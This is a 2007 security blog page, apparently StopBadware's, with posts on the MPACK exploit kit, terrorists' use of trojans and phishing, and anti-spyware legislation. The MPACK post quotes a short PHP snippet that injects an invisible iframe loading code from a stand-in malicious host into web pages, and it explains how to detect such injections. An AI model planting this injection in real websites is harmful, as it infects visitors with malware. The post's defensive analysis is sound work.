Blog

Dealing with weaponized exploits

Posted on July 13, 2007 - 15:08 by zeroday

The folks at SANS published an excellent write up which breaks down the MPACK exploit package. MPACK confirmed a lot of theories that SBW had regarding exploit patterns recorded over time. In particular they use nit like behavior which homes in on the "scalp" of html document such as <body> and <html> tags. The following code was pointed out in the SANS entry:

$file_types = array('php', 'htm', 'html', 'tpl');
$iframed_content = str_replace('</body>',
'<iframe src=http://[EVIL].info/counter style=display:none>
</iframe></body>', $content);

The code above looks for the closing body tag and prepends an invisible iframe to it. If we break down the iframe tag the parameters achieve the following:

  • src = the url of the malicious code that is loaded
  • style = turns iframe invisible using CSS style trick

Other variants to induce invisibility include using width="0" and height="0" which has the same effect as style=display:none.

The Stopbadware team has seen this pattern for quite some time and it is possible that other packaged exploits use this style. It was more common in less technically impressive distributions to see the exploit appended to the file. This would be accomplished by using the "echo" command to simply append the iframe to the end of any html or php file. It is fair to say that if an iframe (or javascript) occurs before the opening html tag (<html>) or after the closing html tag (</html>) someone has injected code into that page.

The SANS entry goes on to provide reasons behind the success of these attacks. The analysis confirms a great many theories we had come up with. In particular the ability to compromise a single account and leverage that into a system wide exploit. This is particularly effective when used against "value" hosting providers who push 1000 or more websites onto a single box. It would make sense for hosting providers who are on our lists to consider following the changes recommended by this guid [1] and setup suExec or a proper chroot jail for the webserver. Before embarking on this task realize that there are issues to setting up suExec or a chroot jail. These issues include:

  • increased time to setup
  • more support tickets due to increased complexity
  • more resource use (ram, processor) means less users per server

However the upside is that a single compromise will not lead to the infection of all the other users on your system. Thousands of support calls and possibly the loss of revenue as an angry, and infected, userbase migrate over to a more secure hosting provider are a potential downside to not implementing a more secure environment. Stopbadware will be making a point of educating website owners in our community to ask their hosting providers for these security measures to ensure they seek out more secure environments.

[1] http://www.seaoffire.net/fcgi-faq.html

Tags: 
exploits, mpack

Badware's terrorist connection

Posted on July 6, 2007 - 17:16 by egeorge

The Washington Post today has a fascinating look at how three UK-based terrorists used badware and phishing scams to finance their criminal operations. The scale of the scams is mind-boggling, though unfortunately not as unusual as you might think.

The article notes that, "All told, investigators said al-Daour and his compatriots made more than $3.5 million in fraudulent charges using credit card accounts they stole via online phishing scams and the distribution of Trojan horses -- computer programs embedded in innocent-looking e-mail messages or Web sites that give criminals control over infected computers."

This highlights the strong ties between badware and crime of all stripes. The identity and financial information being stolen through trojans and keyloggers isn't just lining the pockets of rich gangsters - it's also helping finance acts of terrorism.

Read the full article here (may require free registration).

Tags: 
badware, crime, terrorism

More debate over anti-spyware laws

Posted on July 2, 2007 - 13:23 by egeorge

Debate over several proposed U.S. federal anti-spyware laws continued at the Anti-Spyware Coalition conference last week at Harvard. In a panel on public policy moderated by StopBadware's own John Palfrey, panelists from the Center for Democracy and Technology and the Federal Trade Commission disagreed on the best way forward for legislation that combats spyware.

The three potential bills at stake are the I-Spy Act and the Spy Act, both recently passed in the House, and the Counter Spy Act, recently re-introduced in the Senate after failing to pass in previous sessions. Ari Schwartz, deputy director of the CDT, said that the CDT supports all three bills, on the principle that any further clarification of the illegality of spyware is a good thing. Tracy Shapiro, an attorney at the FTC, said that the FTC feels it already has enough legal power at its disposal and that further legislation might actually cause confusion.

InfoWorld highlights the debate in an article here. You can also read more about the I-Spy and Spy acts in earlier StopBadware blog posts here.

Tags: 
antispywarecoalition, asc, legislation, spyware

Pages